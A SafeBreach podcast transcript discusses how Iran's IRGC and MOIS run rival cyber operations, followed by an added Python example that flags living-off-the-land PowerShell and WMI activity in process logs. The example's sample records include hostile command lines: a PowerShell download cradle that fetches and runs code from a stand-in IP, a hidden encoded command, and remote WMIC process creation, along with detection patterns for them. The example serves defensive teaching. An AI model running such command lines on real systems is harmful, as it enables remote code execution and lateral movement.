Jan 27, 2026
Iran’s Cyber Shadow War: IRGC, MOIS, and the Battle for Control
Welcome back to the Cyber Resilience Brief, a SafeBreach podcast. I’m Tova Devoreen, your host, and I’m here with Adrian Culley, my cohost and our lead offensive cybersecurity engineer at SafeBreach. In our last episode on Iran, we looked at the big bang, Stuxnet, and how it forced Iran to build a digital arsenal from the ashes. Thank you, everybody, for joining us back in the SafeBreach studios. Today, we’re going to go inside the machine, following on from our first episode. If you want to defend against a threat, you have to understand who’s signing the checks. And in Iran, those checks come from a divided house. And we’re not talking about Hogwarts. We’re talking about the rivalry between the IRGC, the Iranian Revolutionary Guard Corps, and the MOIS, the Ministry of Intelligence and Security. Adrian, our work suggests that this isn’t just a bureaucratic overlap. It’s an all-out competition.

Tova, it’s Game of Thrones in cyberspace. House IRGC, House MOIS. Winter is coming. That competition has massive implications for how they target Western infrastructure.

Okay. Let’s start with the players, and let’s talk about why this works. Let’s start with the IRGC. They are the guardians of the revolution. I personally have encountered them, as a former journalist, only in terms of physical threats and IRL military moves. What’s their DNA in terms of cyber?

So the IRGC, Tova, is the muscle. They’re ideologically driven, aggressive, and often less concerned with stealth. Think back to episode one and the Shamoon attack on Saudi Aramco. Their units, like the IRGC-CEC, the Cyber Electronic Command, focus on hard targets: critical infrastructure, military contractors, direct disruption wherever they can. When you see an attack on a US water utility or a loud hack-and-leak operation, that’s usually IRGC-backed. They want you to know they were there.

Okay, and then on the other hand you have the Ministry of Intelligence and Security, the MOIS.
They’re the civilian intelligence agency, right?

The MOIS, correct. They’re the descendants of what was the former Shah of Iran’s SAVAK. Think of them as the eyes; they’re more aligned with traditional espionage. They focus on long-term intelligence gathering, telecommunications, finance. Their goal isn’t to break things. It’s much more subtle: it’s to sit quietly on a network for years, harvesting data. Groups like MuddyWater or OilRig, who we’ll dive into in the next episode, are their primary tools and presence. A really interesting dynamic here: because these two agencies are competing for the Supreme Leader’s favor, they often target the same victims using different methods.

And, you know, we’ve seen this in other areas as well. We’ve seen it with North Korea in particular, is what I’m thinking about. What’s the logic here of introducing internal competition? How does it make for effective cybercrime, and why are we seeing it across the CRINK nexus?

So it’s interesting. Wherever you get military systems you get hierarchies, wherever you get disciplined systems, and wherever you get military hierarchies you get cap badge rivalry. In most organizations it’s actively encouraged. The problem here with the IRGC-CEC and MOIS is they’ve both actually got the ability to be very, very disruptive. So for those of us in the West, their cap badge rivalry sometimes translates into very real kinetic, disruptive activity, and that’s a noise problem for defenders. You might see a blunt, sloppy IRGC phishing attempt on Monday, and whilst your SOC is busy dealing with that and clearing it up, there’s a Ministry of State Security operative, an MOIS operative, using the distraction to slip through a much more sophisticated backdoor. They use each other’s operations as unintended smoke screens.

Interesting. And we’ll get more into that with Russia as well, for those listeners who are following, so stay tuned.
They have more than one organization operating there. One thing that really stands out in our work is that the Iranian government doesn’t just hire hackers as soldiers. They have the contractor model. Tell us a little bit about that.

So this is the secret sauce of their deniability, Tova. Imagine a private software company in downtown Tehran. On the surface, they develop mobile apps or do IT consulting. But in reality, they’re a dedicated cell for the IRGC.

Right. We’ve seen this with companies, in the case of Emennet Pasargad, which we covered on a previous episode.

Exactly. Many of those companies are now sanctioned by the West, many of their staff are wanted criminals, so these contractors are agile. They don’t have the red tape of a government agency. They can experiment with new malware, use off-the-shelf hacking tools, and if they get caught, all the Iranian government says is, “We have no idea who these people are. They’re just private citizens.”

Plausible deniability at its best, and it makes attribution a nightmare.

It’s why, you know, Western governments and intelligence agencies tread very carefully when it comes to attribution. It is not for the faint-hearted. It’s very difficult, and these intelligence-agency-backed threat groups are actively seeking to make attribution very difficult. But they do leave footprints. The contractors often reuse code across different front companies. We’re aware that even when they change their names or IP addresses, the behavioral patterns, how they move laterally, how they exfiltrate data, stay the same: their footprints and fingerprints. And as defenders, this is where we focus.

Quick pause. Do we actually break down the typical TTPs and IOCs in the next episode? I haven’t seen the other scripts yet.

We do. We maybe look at that in terms of getting deeper in and referring to one of our scenarios, but we do.

Yeah. Okay. Fine. Yeah.
And we’ll dig deeper into the Iranian TTPs and IOCs in future episodes, where you’ll be able to tell who might be breaking into your systems. But anyway, Adrian, that does bring us back to the SafeBreach perspective. If we’re facing two different agencies, two different styles, but from one threat actor, and one of those styles is loud and aggressive and the other one is quiet and sneaky, I think we’re looking at a good continuous automated red teaming situation here from our product suite. What can we say about that?

So this is where the continuous part of CTEM is vital. If you only test your defenses against known threats once a month, you’re missing the evolution of these contractors.

Right. Because how so? Like, we know that. So you’d say, what is it that we’re looking for here, Adrian?

So let’s take the IRGC’s loud style. We can use BAS to simulate their aggressive wiper tactics. We validate that your EDR will block the specific payload, but then we use SafeBreach Propagate to mimic the MOIS style. So we’re actually emulating them at this point, the stealthy lateral movement.

Right. This is where the entire platform works together as a whole, where you also have FAST looking from the outside in and Propagate, which is attack path validation, looking from the inside out. It looks at how an attacker moves after they get in.

Exactly, Tova. It’s about quantifying the blast radius. If an MOIS contractor gets a foothold in your marketing department, can they find a path to the financial servers? Propagate automates that red teaming logic. It doesn’t just check if a door is locked. It tries to see if a window is open, if there’s a crawl space, if there’s ducting or vents it can get through. To extend this analogy, is there a spare key under the mat? Is the combination to the key safe on the wall guessable?
With Propagate we go through as many attack paths as possible to see if we can get in, and this is where we’re emulating the attacker. We’re doing what they would do.

Exactly. And because we see that these Iranian actors are increasingly living off the land, using your own admin tools against you, not only will standard antivirus not catch them, but in general, when we looked at a year’s worth of attack data recently, that’s 1.8 million simulations, most companies are only seeing blocked actions 60 percent of the time. So it’s extra, extra important to take a careful look at your tests and run those tests frequently.

So if you think about an analogy, Tova, legacy antivirus is hash-based. They’re taking a binary piece of code, they’re calculating a hash value as a fingerprint, and they’re saying, do we know whether that’s good or bad? That’s like trying to lower crime by reading car number plates. Just because you get the number plate of the car doesn’t actually tell you anything about what’s going on inside that car, or what the occupants of the car are going to do when they leave the car, or what they did before they got into the car. Living off the land, we look at, for example, PowerShell. They’re using WMI. To a standard security tool, it looks like a normal IT admin doing what they should be doing with WMI, but adversarial exposure validation can tell the difference. We can show you, hey, this PowerShell script isn’t coming from your admin. It’s following a pattern we’ve seen with Iranian contractors.

Yeah. Another reason why continuous validation is so important. Now looking ahead to 2026, we’re recording this in January. We’re expecting this to air at the end of January, early February. Do we expect this rivalry to continue? Are they getting better at working together, or do we think that world events might topple it entirely? What’s your prediction?

So what we’re starting to see is they’re sharing infrastructure.
We’re seeing more and more cases where the MOIS provides the initial access, so they’re their own internal initial access broker. They’re doing the breaking in, and then they’re handing the keys over to the IRGC for the destruction or the leak. As the regime crumbles in Iran, we should anticipate far more desperate actions: them not being so concerned about the tradecraft and maintaining that low-profile persistence, and then lashing out, causing as much destruction as they can.

That’s a terrifying tag team.

It is. It means the quiet phase is getting shorter and may well be over. If you don’t catch the spy within the first 48 hours, the vandal is going to show up and burn the house down. That’s why exposure validation has to be real time. You need to know what your dwell time is, and you need to be working on getting it effectively to zero. You can’t have these attackers dwelling in your system.

Okay. So the command centers are divided, but their impact is doubling. We’ve gone from the big bang to the shadow bureaucracy. And next time we’ll be putting names to faces. We’re going to look at the big three of Iranian APTs: APT33, OilRig, and MuddyWater. These are groups that are actually in the trenches and in your networks.

The good news is SafeBreach, SafeBreach Labs, our researchers, have cutting-edge, in-depth knowledge of the behaviors and the tactics, techniques, and procedures used by these groups, and we empower you to both simulate and emulate these attacks before you get hit.

Absolutely. We’re going to break down their favorite tools and, more importantly, how you could use an adversarial exposure validation platform like SafeBreach to make sure their tools never work on you. Look forward to seeing you then.

That’s right. Listeners, thank you so much for being here. I’m Tova Devoreen.

And I’m Adrian.

This has been the Cyber Resilience Brief. And until next time, stay safe. Stay safe with SafeBreach.
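The hash-versus-behaviour point made in the conversation (a signed powershell.exe or WMIC.exe hashes as "known good" whatever it is asked to do, so a living-off-the-land operator passes a hash check and has to be caught on what the process does, who launched it and what spawned it) is easiest to see on a handful of process-creation records. The Python below is an added example written for this page; it is not SafeBreach code and does not describe how the SafeBreach platform works. The five log records, the admin-account allowlist, the name-based stand-in for a hash allowlist, and the behavioural rules are all constructed for illustration.

```python
"""Added example (not SafeBreach code): hash allowlist vs. behavioural rules
on living-off-the-land PowerShell / WMI activity. All inputs are constructed."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    user: str      # account the process ran as
    parent: str    # parent process image name
    image: str     # full path of the new process
    cmdline: str   # command line as logged


# Constructed process-creation records, loosely shaped like Sysmon event 1 / 4688.
# Fields: user | parent | image | cmdline. "SQBFAFgA" is base64 of UTF-16LE "IEX".
SAMPLE_LOG = r"""
CORP\svc_backup | services.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -File C:\scripts\backup.ps1
CORP\jsmith | WINWORD.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -nop -w hidden -EncodedCommand SQBFAFgA
CORP\helpdesk1 | cmd.exe | C:\Windows\System32\wbem\WMIC.exe | wmic /node:FIN-DB01 process call create "powershell -enc SQBFAFgA"
NT AUTHORITY\SYSTEM | WmiPrvSE.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')
CORP\helpdesk1 | explorer.exe | C:\Windows\System32\wbem\WMIC.exe | wmic os get caption
"""


def parse_log(text):
    events = []
    for line in text.strip().splitlines():
        user, parent, image, cmdline = [f.strip() for f in line.split(" | ", 3)]
        events.append(ProcEvent(user, parent, image, cmdline))
    return events


def image_name(ev):
    return ev.image.rsplit("\\", 1)[-1].lower()


# Stand-in for a hash allowlist: a real AV hashes the file on disk, but since these
# are Microsoft's own signed binaries the verdict is "known-good" for every record.
KNOWN_GOOD_BINARIES = {"powershell.exe", "wmic.exe"}


def hash_verdict(ev):
    return "known-good" if image_name(ev) in KNOWN_GOOD_BINARIES else "unknown"


# Behavioural context (constructed): who is expected to run PowerShell, and which
# parents should never spawn it.
ADMIN_ACCOUNTS = {r"CORP\svc_backup", r"CORP\helpdesk1"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|Net\.WebClient", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def behaviour_reasons(ev):
    """Rules that look at what the process does, not what binary it is."""
    reasons = []
    name, parent, cmd = image_name(ev), ev.parent.lower(), ev.cmdline
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        cmd = cmd + " " + decoded          # scan the decoded payload as well
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        reasons.append("hidden window")
    if CRADLE.search(cmd):
        reasons.append("IEX / download cradle")
    if name == "powershell.exe" and parent in OFFICE_PARENTS:
        reasons.append("PowerShell spawned by Office")
    if name == "powershell.exe" and parent == "wmiprvse.exe":
        reasons.append("PowerShell spawned via WMI provider host")
    if name == "wmic.exe" and re.search(r"/node:\S+.*process\s+call\s+create", cmd, re.I):
        reasons.append("remote process creation over WMI")
    if name == "powershell.exe" and ev.user not in ADMIN_ACCOUNTS:
        reasons.append("PowerShell by account outside admin allowlist")
    return reasons


def triage(text):
    """(user, hash verdict, behavioural reasons) for each record; empty reasons = benign."""
    return [(ev.user, hash_verdict(ev), behaviour_reasons(ev)) for ev in parse_log(text)]


if __name__ == "__main__":
    for user, verdict, reasons in triage(SAMPLE_LOG):
        print(f"{user:22} hash={verdict:10} behaviour={'; '.join(reasons) or 'benign'}")
```

All five records come back "known-good" from the hash check; the behavioural rules clear the backup job and the helpdesk inventory query and flag the other three, including the WMI hop to FIN-DB01 and the PowerShell landing under WmiPrvSE.exe on the far side. Tune the allowlists and parent sets to your own estate before treating any single reason as an alert.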
In This Episode
Inside Iran’s Cyber Power Struggle: In episode 2 of our Iran coverage, we go beyond headlines to unpack how Iran’s cyber operations actually work—and why defenders should care.
It’s not one monolithic threat. It’s a rivalry.
⚔️ IRGC vs. MOIS
One loud and destructive. One quiet and persistent.
Both are competing for influence—and often targeting the same organizations using very different tactics.
That internal competition creates chaos for defenders:
• Noisy attacks as distractions
• Stealthy intrusions hiding in the background
• Contractors and front companies adding layers of deniability
Prevention alone isn’t enough.
Resilience depends on how quickly you can detect lateral movement, limit blast radius, and validate defenses continuously—before one actor hands the keys to another.